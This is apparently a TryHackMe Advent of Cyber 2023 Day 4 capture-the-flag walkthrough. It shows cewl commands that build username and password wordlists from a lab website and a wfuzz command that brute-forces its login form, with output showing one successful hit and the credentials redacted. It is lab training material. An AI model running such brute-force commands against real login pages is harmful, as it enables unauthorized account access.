TryHackMe: Advent of Cyber 2023 - Day 4

[Day 4] Brute-forcing Baby, it's CeWLd outside

What is the correct username and password combination? Format username:password

Ok for this room we will be using CeWL to generate username/password list from the website.

So let's generated the wordlist

└─$ cewl -d 2 -m 5 -w passwords.txt http://{MACHINE-IP} --with-numbers
└─$ cewl -d 0 -m 5 -w usernames.txt http://{MACHINE-IP}/team.php --lowercase

This generates the wordlists so know we can use wfuzz to attempt bruteforce the login page

└─$ wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.22.96/login.php -d "username=FUZZ&password=FUZ2Z"
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.22.96/login.php
Total requests: 9361

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                   
=====================================================================

000006317:   302        118 L    297 W      4442 Ch     "[REDACTED] - [REDACTED]"  

Let's move over to the login page

using the username and password from above we can login and see the emails

Reading the emails we can fidn the flag

What is the flag?

If you enjoyed this task, feel free to check out the Web Enumeration room.